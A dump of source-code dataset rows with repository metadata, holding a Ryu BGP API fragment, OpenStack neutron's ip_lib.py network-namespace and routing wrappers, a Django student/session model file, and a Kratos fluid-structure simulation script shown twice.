'host': address,
'port': port,
}
call(func_name, **param)
def bmp_server_del(self, address, port):
func_name = 'bmp.stop'
param = {
'host': address,
'port': port,
}
call(func_name, **param)
def attribute_map_set(self, address, attribute_maps,
route_dist=None, route_family=RF_VPN_V4):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.set'
param = {
neighbors.IP_ADDRESS: address,
neighbors.ATTRIBUTE_MAP: attribute_maps,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
call(func_name, **param)
def attribute_map_get(self, address, route_dist=None,
route_family=RF_VPN_V4):
if route_family not in SUPPORTED_VRF_RF:
raise ValueError('Unsupported route_family: %s' % route_family)
func_name = 'neighbor.attribute_map.get'
param = {
neighbors.IP_ADDRESS: address,
}
if route_dist is not None:
param[vrfs.ROUTE_DISTINGUISHER] = route_dist
param[vrfs.VRF_RF] = route_family
return call(func_name, **param)
@staticmethod
def _check_rf_and_normalize(prefix):
ip, masklen = prefix.split('/')
if netaddr.valid_ipv6(ip):
ipv6_prefix = str(netaddr.IPAddress(ip)) + '/' + masklen
return vrfs.VRF_RF_IPV6, ipv6_prefix
else:
return vrfs.VRF_RF_IPV4, prefix
| true | true |
1c4aa49b54346a99f2e75e366d65a02354ae6854 | 24,529 | py | Python | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | neutron/agent/linux/ip_lib.py | insequent/neutron | 2b1c4f121e3e8ba1c5eb2ba6661bf6326e1507c5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import netaddr
import os
from oslo_config import cfg
from oslo_log import log as logging
from neutron.agent.linux import utils
from neutron.common import exceptions
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
OPTS = [
cfg.BoolOpt('ip_lib_force_root',
default=False,
help=_('Force ip_lib calls to use the root helper')),
]
LOOPBACK_DEVNAME = 'lo'
SYS_NET_PATH = '/sys/class/net'
class SubProcessBase(object):
def __init__(self, namespace=None,
log_fail_as_error=True):
self.namespace = namespace
self.log_fail_as_error = log_fail_as_error
try:
self.force_root = cfg.CONF.ip_lib_force_root
except cfg.NoSuchOptError:
# Only callers that need to force use of the root helper
# need to register the option.
self.force_root = False
def _run(self, options, command, args):
if self.namespace:
return self._as_root(options, command, args)
elif self.force_root:
# Force use of the root helper to ensure that commands
# will execute in dom0 when running under XenServer/XCP.
return self._execute(options, command, args, run_as_root=True,
log_fail_as_error=self.log_fail_as_error)
else:
return self._execute(options, command, args,
log_fail_as_error=self.log_fail_as_error)
def _as_root(self, options, command, args, use_root_namespace=False):
namespace = self.namespace if not use_root_namespace else None
return self._execute(options, command, args, run_as_root=True,
namespace=namespace,
log_fail_as_error=self.log_fail_as_error)
@classmethod
def _execute(cls, options, command, args, run_as_root=False,
namespace=None, log_fail_as_error=True):
opt_list = ['-%s' % o for o in options]
ip_cmd = add_namespace_to_cmd(['ip'], namespace)
cmd = ip_cmd + opt_list + [command] + list(args)
return utils.execute(cmd, run_as_root=run_as_root,
log_fail_as_error=log_fail_as_error)
def set_log_fail_as_error(self, fail_with_error):
self.log_fail_as_error = fail_with_error
class IPWrapper(SubProcessBase):
def __init__(self, namespace=None):
super(IPWrapper, self).__init__(namespace=namespace)
self.netns = IpNetnsCommand(self)
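    # Typical usage (sketch; the namespace name is illustrative):
    #
    #   ip = IPWrapper(namespace='qrouter-1234')
    #   for device in ip.get_devices(exclude_loopback=True):
    #       print(device.name)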
def device(self, name):
return IPDevice(name, namespace=self.namespace)
def get_devices(self, exclude_loopback=False):
retval = []
if self.namespace:
# we call out manually because in order to avoid screen scraping
# iproute2 we use find to see what is in the sysfs directory, as
# suggested by Stephen Hemminger (iproute2 dev).
output = utils.execute(['ip', 'netns', 'exec', self.namespace,
'find', SYS_NET_PATH, '-maxdepth', '1',
'-type', 'l', '-printf', '%f '],
run_as_root=True,
log_fail_as_error=self.log_fail_as_error
).split()
else:
output = (
i for i in os.listdir(SYS_NET_PATH)
if os.path.islink(os.path.join(SYS_NET_PATH, i))
)
for name in output:
if exclude_loopback and name == LOOPBACK_DEVNAME:
continue
retval.append(IPDevice(name, namespace=self.namespace))
return retval
def add_tuntap(self, name, mode='tap'):
self._as_root([], 'tuntap', ('add', name, 'mode', mode))
return IPDevice(name, namespace=self.namespace)
def add_veth(self, name1, name2, namespace2=None):
args = ['add', name1, 'type', 'veth', 'peer', 'name', name2]
if namespace2 is None:
namespace2 = self.namespace
else:
self.ensure_namespace(namespace2)
args += ['netns', namespace2]
self._as_root([], 'link', tuple(args))
return (IPDevice(name1, namespace=self.namespace),
IPDevice(name2, namespace=namespace2))
def del_veth(self, name):
"""Delete a virtual interface between two namespaces."""
self._as_root([], 'link', ('del', name))
def ensure_namespace(self, name):
if not self.netns.exists(name):
ip = self.netns.add(name)
lo = ip.device(LOOPBACK_DEVNAME)
lo.link.set_up()
else:
ip = IPWrapper(namespace=name)
return ip
def namespace_is_empty(self):
return not self.get_devices(exclude_loopback=True)
def garbage_collect_namespace(self):
"""Conditionally destroy the namespace if it is empty."""
if self.namespace and self.netns.exists(self.namespace):
if self.namespace_is_empty():
self.netns.delete(self.namespace)
return True
return False
def add_device_to_namespace(self, device):
if self.namespace:
device.link.set_netns(self.namespace)
def add_vxlan(self, name, vni, group=None, dev=None, ttl=None, tos=None,
local=None, port=None, proxy=False):
cmd = ['add', name, 'type', 'vxlan', 'id', vni]
if group:
cmd.extend(['group', group])
if dev:
cmd.extend(['dev', dev])
if ttl:
cmd.extend(['ttl', ttl])
if tos:
cmd.extend(['tos', tos])
if local:
cmd.extend(['local', local])
if proxy:
cmd.append('proxy')
# tuple: min,max
if port and len(port) == 2:
cmd.extend(['port', port[0], port[1]])
elif port:
raise exceptions.NetworkVxlanPortRangeError(vxlan_range=port)
self._as_root([], 'link', cmd)
return (IPDevice(name, namespace=self.namespace))
@classmethod
def get_namespaces(cls):
output = cls._execute([], 'netns', ('list',))
return [l.strip() for l in output.split('\n')]
class IPDevice(SubProcessBase):
def __init__(self, name, namespace=None):
super(IPDevice, self).__init__(namespace=namespace)
self.name = name
self.link = IpLinkCommand(self)
self.addr = IpAddrCommand(self)
self.route = IpRouteCommand(self)
self.neigh = IpNeighCommand(self)
def __eq__(self, other):
return (other is not None and self.name == other.name
and self.namespace == other.namespace)
def __str__(self):
return self.name
class IpCommandBase(object):
COMMAND = ''
def __init__(self, parent):
self._parent = parent
def _run(self, options, args):
return self._parent._run(options, self.COMMAND, args)
def _as_root(self, options, args, use_root_namespace=False):
return self._parent._as_root(options,
self.COMMAND,
args,
use_root_namespace=use_root_namespace)
class IPRule(SubProcessBase):
def __init__(self, namespace=None):
super(IPRule, self).__init__(namespace=namespace)
self.rule = IpRuleCommand(self)
class IpRuleCommand(IpCommandBase):
COMMAND = 'rule'
def _exists(self, ip, ip_version, table, rule_pr):
# Typical rule from 'ip rule show':
# 4030201: from 1.2.3.4/24 lookup 10203040
rule_pr = str(rule_pr) + ":"
for line in self._as_root([ip_version], ['show']).splitlines():
parts = line.split()
if parts and (parts[0] == rule_pr and
parts[2] == str(ip) and
parts[-1] == str(table)):
return True
return False
def add(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
if not self._exists(ip, ip_version, table, rule_pr):
args = ['add', 'from', ip, 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
def delete(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
args = ['del', 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
class IpDeviceCommandBase(IpCommandBase):
@property
def name(self):
return self._parent.name
class IpLinkCommand(IpDeviceCommandBase):
COMMAND = 'link'
def set_address(self, mac_address):
self._as_root([], ('set', self.name, 'address', mac_address))
def set_mtu(self, mtu_size):
self._as_root([], ('set', self.name, 'mtu', mtu_size))
def set_up(self):
self._as_root([], ('set', self.name, 'up'))
def set_down(self):
self._as_root([], ('set', self.name, 'down'))
def set_netns(self, namespace):
self._as_root([], ('set', self.name, 'netns', namespace))
self._parent.namespace = namespace
def set_name(self, name):
self._as_root([], ('set', self.name, 'name', name))
self._parent.name = name
def set_alias(self, alias_name):
self._as_root([], ('set', self.name, 'alias', alias_name))
def delete(self):
self._as_root([], ('delete', self.name))
@property
def address(self):
return self.attributes.get('link/ether')
@property
def state(self):
return self.attributes.get('state')
@property
def mtu(self):
return self.attributes.get('mtu')
@property
def qdisc(self):
return self.attributes.get('qdisc')
@property
def qlen(self):
return self.attributes.get('qlen')
@property
def alias(self):
return self.attributes.get('alias')
@property
def attributes(self):
return self._parse_line(self._run(['o'], ('show', self.name)))
def _parse_line(self, value):
if not value:
return {}
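        # 'ip -o link show <dev>' prints something like:
        #   "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN ..."
        # Everything up to the end of the flag list ('>') is dropped and the
        # remaining whitespace-separated tokens are paired up as key/value.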
device_name, settings = value.replace("\\", '').split('>', 1)
tokens = settings.split()
keys = tokens[::2]
values = [int(v) if v.isdigit() else v for v in tokens[1::2]]
retval = dict(zip(keys, values))
return retval
class IpAddrCommand(IpDeviceCommandBase):
COMMAND = 'addr'
def add(self, cidr, scope='global'):
net = netaddr.IPNetwork(cidr)
args = ['add', cidr,
'scope', scope,
'dev', self.name]
if net.version == 4:
args += ['brd', str(net.broadcast)]
self._as_root([net.version], tuple(args))
def delete(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name))
def flush(self, ip_version):
self._as_root([ip_version], ('flush', self.name))
def list(self, scope=None, to=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['show', self.name]
if filters:
args += filters
retval = []
if scope:
args += ['scope', scope]
if to:
args += ['to', to]
for line in self._run(options, tuple(args)).split('\n'):
line = line.strip()
if not line.startswith('inet'):
continue
parts = line.split()
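            # Sample lines being parsed:
            #   inet 10.0.0.2/24 brd 10.0.0.255 scope global eth0
            #   inet6 fe80::f816:3eff:fe01:102/64 scope link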
if parts[0] == 'inet6':
scope = parts[3]
else:
if parts[2] == 'brd':
scope = parts[5]
else:
scope = parts[3]
retval.append(dict(cidr=parts[1],
scope=scope,
dynamic=('dynamic' == parts[-1])))
return retval
class IpRouteCommand(IpDeviceCommandBase):
COMMAND = 'route'
def add_gateway(self, gateway, metric=None, table=None):
ip_version = get_ip_version(gateway)
args = ['replace', 'default', 'via', gateway]
if metric:
args += ['metric', metric]
args += ['dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_gateway(self, gateway, table=None):
ip_version = get_ip_version(gateway)
args = ['del', 'default',
'via', gateway,
'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def list_onlink_routes(self, ip_version):
def iterate_routes():
output = self._run([ip_version],
('list',
'dev', self.name,
'scope', 'link'))
for line in output.split('\n'):
line = line.strip()
if line and not line.count('src'):
yield line
return [x for x in iterate_routes()]
def add_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('replace', cidr,
'dev', self.name,
'scope', 'link'))
def delete_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name,
'scope', 'link'))
def get_gateway(self, scope=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['list', 'dev', self.name]
if filters:
args += filters
retval = None
if scope:
args += ['scope', scope]
route_list_lines = self._run(options, tuple(args)).split('\n')
default_route_line = next((x.strip() for x in
route_list_lines if
x.strip().startswith('default')), None)
if default_route_line:
gateway_index = 2
parts = default_route_line.split()
retval = dict(gateway=parts[gateway_index])
if 'metric' in parts:
metric_index = parts.index('metric') + 1
retval.update(metric=int(parts[metric_index]))
return retval
def pullup_route(self, interface_name):
"""Ensures that the route entry for the interface is before all
others on the same subnet.
"""
device_list = []
device_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'dev', interface_name)
).split('\n')
for device_route_line in device_route_list_lines:
try:
subnet = device_route_line.split()[0]
except Exception:
continue
subnet_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'match', subnet)
).split('\n')
for subnet_route_line in subnet_route_list_lines:
i = iter(subnet_route_line.split())
while(i.next() != 'dev'):
pass
device = i.next()
try:
while(i.next() != 'src'):
pass
src = i.next()
except Exception:
src = ''
if device != interface_name:
device_list.append((device, src))
else:
break
for (device, src) in device_list:
self._as_root([], ('del', subnet, 'dev', device))
if (src != ''):
self._as_root([],
('append', subnet,
'proto', 'kernel',
'src', src,
'dev', device))
else:
self._as_root([],
('append', subnet,
'proto', 'kernel',
'dev', device))
def add_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['replace', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['del', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
class IpNeighCommand(IpDeviceCommandBase):
COMMAND = 'neigh'
def add(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('replace', ip_address,
'lladdr', mac_address,
'nud', 'permanent',
'dev', self.name))
def delete(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('del', ip_address,
'lladdr', mac_address,
'dev', self.name))
class IpNetnsCommand(IpCommandBase):
COMMAND = 'netns'
def add(self, name):
self._as_root([], ('add', name), use_root_namespace=True)
wrapper = IPWrapper(namespace=name)
wrapper.netns.execute(['sysctl', '-w',
'net.ipv4.conf.all.promote_secondaries=1'])
return wrapper
def delete(self, name):
self._as_root([], ('delete', name), use_root_namespace=True)
def execute(self, cmds, addl_env=None, check_exit_code=True,
extra_ok_codes=None):
ns_params = []
kwargs = {}
if self._parent.namespace:
kwargs['run_as_root'] = True
ns_params = ['ip', 'netns', 'exec', self._parent.namespace]
env_params = []
if addl_env:
env_params = (['env'] +
['%s=%s' % pair for pair in addl_env.items()])
cmd = ns_params + env_params + list(cmds)
return utils.execute(cmd, check_exit_code=check_exit_code,
extra_ok_codes=extra_ok_codes, **kwargs)
def exists(self, name):
output = self._parent._execute(
['o'], 'netns', ['list'],
run_as_root=cfg.CONF.AGENT.use_helper_for_ns_read)
for line in output.split('\n'):
if name == line.strip():
return True
return False
def device_exists(device_name, namespace=None):
"""Return True if the device exists in the namespace."""
try:
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
address = dev.link.address
except RuntimeError:
return False
return bool(address)
def device_exists_with_ip_mac(device_name, ip_cidr, mac, namespace=None):
"""Return True if the device with the given IP and MAC addresses
exists in the namespace.
"""
try:
device = IPDevice(device_name, namespace=namespace)
if mac != device.link.address:
return False
if ip_cidr not in (ip['cidr'] for ip in device.addr.list()):
return False
except RuntimeError:
return False
else:
return True
def get_routing_table(namespace=None):
"""Return a list of dictionaries, each representing a route.
The dictionary format is: {'destination': cidr,
'nexthop': ip,
'device': device_name}
"""
ip_wrapper = IPWrapper(namespace=namespace)
table = ip_wrapper.netns.execute(['ip', 'route'], check_exit_code=True)
routes = []
# Example for route_lines:
# default via 192.168.3.120 dev wlp3s0 proto static metric 1024
# 10.0.0.0/8 dev tun0 proto static scope link metric 1024
# The first column is the destination, followed by key/value pairs.
# The generator splits the routing table by newline, then strips and splits
# each individual line.
route_lines = (line.split() for line in table.split('\n') if line.strip())
for route in route_lines:
network = route[0]
# Create a dict of key/value pairs (For example - 'dev': 'tun0')
# excluding the first column.
data = dict(route[i:i + 2] for i in range(1, len(route), 2))
routes.append({'destination': network,
'nexthop': data.get('via'),
'device': data.get('dev')})
return routes
def ensure_device_is_ready(device_name, namespace=None):
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
try:
# Ensure the device is up, even if it is already up. If the device
# doesn't exist, a RuntimeError will be raised.
dev.link.set_up()
except RuntimeError:
return False
return True
def iproute_arg_supported(command, arg):
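    # 'ip <command> help' prints its usage text on stderr; the argument is
    # considered supported when it appears anywhere in that text.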
command += ['help']
stdout, stderr = utils.execute(command, check_exit_code=False,
return_stderr=True)
return any(arg in line for line in stderr.split('\n'))
def _arping(ns_name, iface_name, address, count):
# Pass -w to set timeout to ensure exit if interface removed while running
arping_cmd = ['arping', '-A', '-I', iface_name, '-c', count,
'-w', 1.5 * count, address]
try:
ip_wrapper = IPWrapper(namespace=ns_name)
ip_wrapper.netns.execute(arping_cmd, check_exit_code=True)
except Exception:
msg = _LE("Failed sending gratuitous ARP "
"to %(addr)s on %(iface)s in namespace %(ns)s")
LOG.exception(msg, {'addr': address,
'iface': iface_name,
'ns': ns_name})
def send_gratuitous_arp(ns_name, iface_name, address, count):
"""Send a gratuitous arp using given namespace, interface, and address."""
def arping():
_arping(ns_name, iface_name, address, count)
if count > 0:
eventlet.spawn_n(arping)
def send_garp_for_proxyarp(ns_name, iface_name, address, count):
"""
Send a gratuitous arp using given namespace, interface, and address
This version should be used when proxy arp is in use since the interface
won't actually have the address configured. We actually need to configure
the address on the interface and then remove it when the proxy arp has been
sent.
"""
def arping_with_temporary_address():
# Configure the address on the interface
device = IPDevice(iface_name, namespace=ns_name)
net = netaddr.IPNetwork(str(address))
device.addr.add(str(net))
_arping(ns_name, iface_name, address, count)
# Delete the address from the interface
device.addr.delete(str(net))
if count > 0:
eventlet.spawn_n(arping_with_temporary_address)
def add_namespace_to_cmd(cmd, namespace=None):
"""Add an optional namespace to the command."""
return ['ip', 'netns', 'exec', namespace] + cmd if namespace else cmd
def get_ip_version(ip_or_cidr):
return netaddr.IPNetwork(ip_or_cidr).version
| 34.068056 | 79 | 0.555669 |
| true | true |
1c4aa4e22c898d243a62cb37a4da258b2d74fcfd | 1,829 | py | Python | imageRead/aluno/models.py | Sou-eu-Miguel/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 1 | 2018-12-12T21:36:10.000Z | 2018-12-12T21:36:10.000Z | imageRead/aluno/models.py | LucasLimakxy/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 6 | 2021-02-02T22:56:52.000Z | 2022-03-12T00:43:59.000Z | imageRead/aluno/models.py | Sou-eu-Miguel/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 1 | 2018-12-13T20:58:16.000Z | 2018-12-13T20:58:16.000Z | from decimal import Decimal
from django.core.validators import MinValueValidator
from django.db import models
from django.urls import reverse
from ..turma.models import Turma, Sessao
# Create your models here.
class Aluno(models.Model):
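    # A student enrolled in a class (Turma), identified by a unique
    # registration number (matricula).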
nome = models.CharField('Nome', max_length=60)
matricula = models.CharField('matricula', max_length=11, unique=True)
    # on_delete=False is not a valid option; CASCADE is assumed here to
    # match the ForeignKeys on AlunoSessao below.
    turma = models.ForeignKey(Turma, on_delete=models.CASCADE, blank=True)
    # String representation: "matricula - nome"
def __str__(self):
return self.matricula + ' - ' + self.nome
    # Display names and default ordering for the model
class Meta:
verbose_name = 'Aluno'
verbose_name_plural = 'Alunos'
ordering = ['nome', 'matricula']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.pk})
class AlunoSessao(models.Model):
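    # Join model linking a student (Aluno) to an exam session (Sessao),
    # storing the computed grade and per-answer descriptions.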
aluno = models.ForeignKey(Aluno, on_delete= models.CASCADE)
sessao = models.ForeignKey(Sessao, on_delete=models.CASCADE)
media = models.DecimalField('Média', decimal_places=2, max_digits=12, validators=[MinValueValidator(Decimal('0.01'))])
descricao_alterativas = models.CharField('Descrição de Alterativas', max_length=60, blank=True)
descricao_pontuacao = models.CharField('Descrição de Pontuação', max_length=60, blank=True)
    # String representation: student name and questionnaire name
def __str__(self):
return "{} - {}".format(self.aluno.nome, self.sessao.questionario.nome)
    # Display names and default ordering for the model
    class Meta:
        verbose_name = 'AlunoSessao'
        verbose_name_plural = 'AlunosSessao'
        ordering = ['aluno', 'sessao', 'media']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.sessao.turma.pk})
| 38.104167 | 140 | 0.65883 |
| true | true |
1c4aa575b2068b531412b4623eb5aec01caa096f | 6,973 | py | Python | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | applications/FSIapplication/test_examples/flag_test.gid/flag_test.py | jiaqiwang969/Kratos-test | ed082abc163e7b627f110a1ae1da465f52f48348 | [
"BSD-4-Clause"
] | null | null | null | ##################################################################
##################################################################
#setting the domain size for the problem to be solved
domain_size = 2
##################################################################
##################################################################
## ATTENTION: here the order is important
#including kratos path
kratos_libs_path = '../../../../libs/' ##kratos_root/libs
kratos_applications_path = '../../../../applications/' ##kratos_root/applications
import sys
sys.path.append(kratos_libs_path)
sys.path.append(kratos_applications_path)
#importing Kratos main library
from Kratos import *
kernel = Kernel() #defining kernel
#importing applications
import applications_interface
applications_interface.Import_ALEApplication = True
applications_interface.Import_IncompressibleFluidApplication = True
applications_interface.Import_StructuralApplication = True
applications_interface.Import_FSIApplication = True
applications_interface.ImportApplications(kernel, kratos_applications_path)
## from now on the order is no longer crucial
##################################################################
##################################################################
from KratosStructuralApplication import *
#defining a model part for the fluid and one for the structure
fluid_model_part = ModelPart("FluidPart");
structure_model_part = ModelPart("StructurePart");
#adding variables for all of the tools needed
import incompressible_fluid_solver
incompressible_fluid_solver.AddVariables(fluid_model_part)
import mesh_solver
mesh_solver.AddVariables(fluid_model_part)
import Conformant_OneSideMap
Conformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
import structural_solver_dynamic
structural_solver_dynamic.AddVariables(structure_model_part)
import ExplicitCoupling
#NonConformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
#introducing input file name
input_file_name = "flag_test"
#reading the fluid part
write_deformed_flag = WriteDeformedMeshFlag.WriteUndeformed
write_elements = WriteConditionsFlag.WriteElementsOnly
post_mode = GiDPostMode.GiD_PostBinary
multi_file_flag = MultiFileFlag.MultipleFiles
gid_io = GidIO( input_file_name+str("_fluid"), post_mode, multi_file_flag, write_deformed_flag, write_elements )
gid_io.ReadModelPart(fluid_model_part)
print fluid_model_part
print "fluid model read correctly"
#reading the structural part
data_io = DatafileIO(input_file_name+str("_structure"))
data_io.ReadModelPart(structure_model_part)
print structure_model_part
print "structural model read correctly"
#setting up the buffer size: SHOULD BE DONE AFTER READING!!!
fluid_model_part.SetBufferSize(3)
structure_model_part.SetBufferSize(2)
##adding dofs
incompressible_fluid_solver.AddDofs(fluid_model_part)
mesh_solver.AddDofs(fluid_model_part)
structural_solver_dynamic.AddDofs(structure_model_part)
#assigning the fluid properties
density = 1.18;
viscosity = 1.82e-5 / density
for node in fluid_model_part.Nodes:
node.SetSolutionStepValue(VISCOSITY,0,viscosity);
node.SetSolutionStepValue(DENSITY,0,density);
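#note: VISCOSITY here is the kinematic viscosity (dynamic viscosity / density);
#the values correspond to air at room temperature (rho ~ 1.18 kg/m3, mu ~ 1.82e-5 Pa s)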
#creating the solvers
#fluid solver
fluid_solver = incompressible_fluid_solver.IncompressibleFluidSolver(fluid_model_part,domain_size)
fluid_solver.laplacian_form = 1; #standard laplacian form
fluid_solver.predictor_corrector = False
fluid_solver.max_press_its = 10
fluid_solver.Initialize()
print "fluid solver created"
#mesh solver
reform_dofs_at_each_step = False
mesh_solver = mesh_solver.MeshSolver(fluid_model_part,domain_size,reform_dofs_at_each_step)
pDiagPrecond = DiagonalPreconditioner()
mesh_solver.linear_solver = CGSolver(1e-3, 300, pDiagPrecond)
mesh_solver.time_order = 2
mesh_solver.Initialize()
mesh_solver.solver.SetEchoLevel(0);
print "mesh solver created"
#structure solver
structure_solver = structural_solver_dynamic.DynamicStructuralSolver(structure_model_part,domain_size)
#structure_solver.echo_level = 0
#pILUPrecond = ILU0Preconditioner()
#structure_solver.structure_linear_solver = BICGSTABSolver(1e-8, 5000,pILUPrecond)
structure_solver.Initialize()
structure_model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic2D() )
print "structural solver created"
#mapper
#non conformant mapper
#mapper = NonConformant_OneSideMap.NonConformant_OneSideMap(fluid_model_part,structure_model_part)
#conformant point to point
utilities = VariableUtils()
interface_fluid_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,fluid_model_part.Nodes)
interface_structure_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,structure_model_part.Nodes)
print "interface fluid nodes = ",len(interface_fluid_nodes)
print "interface structure nodes = ",len(interface_structure_nodes)
mapper = Conformant_OneSideMap.Conformant_OneSideMap(interface_fluid_nodes,interface_structure_nodes)
print "mapper created"
#creating the coupled solver
coupled_solver = ExplicitCoupling.ExplicitCoupling(fluid_model_part,structure_model_part,structure_solver,fluid_solver,mesh_solver,mapper,domain_size)
print "coupled solver created"
#settings to be changed
nsteps = 5000
output_step = 10
Dt = 0.005
out = 0
#mesh to be printed
gid_io.InitializeMesh(0.0)
gid_io.WriteMesh((fluid_model_part).GetMesh());
##gid_io.WriteMesh((structure_model_part).GetMesh(),domain_size,GiDPostMode.GiD_PostBinary);
gid_io.FinalizeMesh()
for step in range(0,nsteps):
time = Dt*step
fluid_model_part.CloneTimeStep(time)
structure_model_part.CloneTimeStep(time)
print "time = " , time
#solving the fluid problem
if(step < 5 ):
if(step > 3):
print "solving only the fluid - starting procedure"
fluid_solver.Solve()
print "solution -only fluid- complete"
else:
print "coupled solve"
coupled_solver.Solve()
#print the results
## gid_io.WriteNodalResults(DISPLACEMENT,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(POSITIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
if(out == output_step):
gid_io.InitializeResults( time, (fluid_model_part).GetMesh() )
# gid_io.WriteNodalResults(MESH_VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(DISPLACEMENT,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(PRESSURE,fluid_model_part.Nodes,time,0)
# gid_io.WriteNodalResults(IS_INTERFACE,fluid_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(IS_INTERFACE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(POSITIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(NEGATIVE_FACE_PRESSURE,structure_model_part.Nodes,time,0)
## gid_io.WriteNodalResults(DISPLACEMENT,structure_model_part.Nodes,time,0)
#gid_io.Flush();
        out = 0
    out = out + 1
| 35.040201 | 150 | 0.76452 | domain_size = 2
kratos_libs_path = '../../../../libs/'
kratos_applications_path = '../../../../applications/'
import sys
sys.path.append(kratos_libs_path)
sys.path.append(kratos_applications_path)
from Kratos import *
kernel = Kernel()
import applications_interface
applications_interface.Import_ALEApplication = True
applications_interface.Import_IncompressibleFluidApplication = True
applications_interface.Import_StructuralApplication = True
applications_interface.Import_FSIApplication = True
applications_interface.ImportApplications(kernel, kratos_applications_path)
from KratosStructuralApplication import *
fluid_model_part = ModelPart("FluidPart");
structure_model_part = ModelPart("StructurePart");
import incompressible_fluid_solver
incompressible_fluid_solver.AddVariables(fluid_model_part)
import mesh_solver
mesh_solver.AddVariables(fluid_model_part)
import Conformant_OneSideMap
Conformant_OneSideMap.AddVariables(fluid_model_part,structure_model_part)
import structural_solver_dynamic
structural_solver_dynamic.AddVariables(structure_model_part)
import ExplicitCoupling
input_file_name = "flag_test"
write_deformed_flag = WriteDeformedMeshFlag.WriteUndeformed
write_elements = WriteConditionsFlag.WriteElementsOnly
post_mode = GiDPostMode.GiD_PostBinary
multi_file_flag = MultiFileFlag.MultipleFiles
gid_io = GidIO( input_file_name+str("_fluid"), post_mode, multi_file_flag, write_deformed_flag, write_elements )
gid_io.ReadModelPart(fluid_model_part)
print fluid_model_part
print "fluid model read correctly"
data_io = DatafileIO(input_file_name+str("_structure"))
data_io.ReadModelPart(structure_model_part)
print structure_model_part
print "structural model read correctly"
fluid_model_part.SetBufferSize(3)
structure_model_part.SetBufferSize(2)
incompressible_fluid_solver.AddDofs(fluid_model_part)
mesh_solver.AddDofs(fluid_model_part)
structural_solver_dynamic.AddDofs(structure_model_part)
density = 1.18;
viscosity = 1.82e-5 / density
for node in fluid_model_part.Nodes:
node.SetSolutionStepValue(VISCOSITY,0,viscosity);
node.SetSolutionStepValue(DENSITY,0,density);
fluid_solver = incompressible_fluid_solver.IncompressibleFluidSolver(fluid_model_part,domain_size)
fluid_solver.laplacian_form = 1;
fluid_solver.predictor_corrector = False
fluid_solver.max_press_its = 10
fluid_solver.Initialize()
print "fluid solver created"
reform_dofs_at_each_step = False
